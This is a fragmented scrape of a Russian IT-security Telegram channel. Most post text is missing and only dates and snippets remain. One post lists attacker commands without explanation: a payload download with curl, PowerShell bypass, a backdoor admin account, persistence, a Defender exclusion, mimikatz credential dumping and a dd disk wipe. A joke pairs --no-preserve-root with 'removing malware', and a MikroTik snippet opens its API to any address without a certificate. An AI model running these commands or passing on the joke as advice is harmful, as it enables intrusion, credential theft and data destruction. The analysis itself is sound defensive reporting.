https://t.me/mikrotikninja/1768
Скоро допилю бота для регистрации без участия человека (меня )
Добро пожаловать в канал Mikrotik Ninja! Если вы увлечены новыми компьютерными технологиями и защитой компьютерных программ, то вы попали по адресу. Наш канал предлагает самые свежие новости, советы и обзоры в мире IT. Подписывайтесь на наш блог по ссылке http://bubnovd.
et, где вы найдете еще больше полезной информации о мире компьютерной безопасности. Вы также можете почитать наши статьи на https://medium.com/@dbubnov и https://xakep.ru/author/bubnovd/. Мы также делимся мыслями неглупых людей в канале https://t.me/channel1name и рекомендуем интересные книги в канале https://t.me/mreadninja. Присоединяйтесь к нам, чтобы быть в курсе всех последних тенденций в мире компьютерных технологий и защиты программ!
14 Jan, 16:01
30 Dec, 08:06
cmd.exe /c
sqlservr.exe
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())
net user admin cas /add
net user admin admin123123123 /add
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet
powershell Add-MpPreference -ExclusionPath '$windir\$system32'
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
sekurlsa::logonpasswords
net user
systeminfo
net localgroup
cd %appdata% && whoami
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
30 Dec, 06:12
24 Dec, 18:11
19 Dec, 08:34
14 Dec, 06:51
10 Dec, 09:24
cat > filename
Ctrl + V
Enter
Ctrl + C
Ctrl + V
09 Dec, 06:52
04 Dec, 10:52
04 Dec, 06:39
> scoop search python
Results from local buckets...
Name Version Source Binaries
---- ------- ------ --------
python 3.10.5 main
winpython 3.10.4.0 main
> scoop install python
...
Creating shim for 'python.exe'.
'python' (3.10.5) was installed successfully!
03 Dec, 07:42
03 Dec, 06:51
02 Dec, 09:03
29 Nov, 08:33
29 Nov, 08:33
29 Nov, 07:36
28 Nov, 16:34
21 Nov, 12:50
15 Nov, 09:41
13 Nov, 15:20
--no-preserve-root
чтобы также удалить малварь из системных директорий 12 Nov, 09:00
07 Nov, 15:59
04 Nov, 13:20
04 Nov, 11:47
02 Nov, 08:41
25 Oct, 06:46
24 Oct, 05:20
23 Oct, 09:29
23 Oct, 05:35
14 Oct, 08:39
gpt-4o
и абсолютно бесплатен. Не могу гарантировать, что так будет всегда, посмотрим что из этого получится./ask
.14 Oct, 05:26
/user group add name=monitoring policy=api,read
/user add name=monitoring group=monitoring password=PASSWORD
/ip firewall address-list add list=grafana.mninja.net address=grafana.mninja.net
/ip firewall filter add chain=input src-address-list=grafana.mninja.net action=accept protocol=tcp dst-port=8729 place-before=1 comment=monitoring
/ip service enable api-ssl
/ip service set api-ssl certificate=none
/ip service set api-ssl address=0.0.0.0/0
11 Oct, 15:28
02 Oct, 08:41
27 Sep, 04:05
systemctl stop cups-browsed && systemctl disable cups-browsed
25 Sep, 14:00
25 Sep, 13:31
25 Sep, 05:37
ForceCommand
.ps -a
или при логине запустить скрипт бэкапа. Ничего другого пользователь сделать не сможет. 20 Sep, 07:10
18 Sep, 07:49
29 Aug, 08:08
28 Aug, 07:01
25 Aug, 11:42
25 Aug, 03:14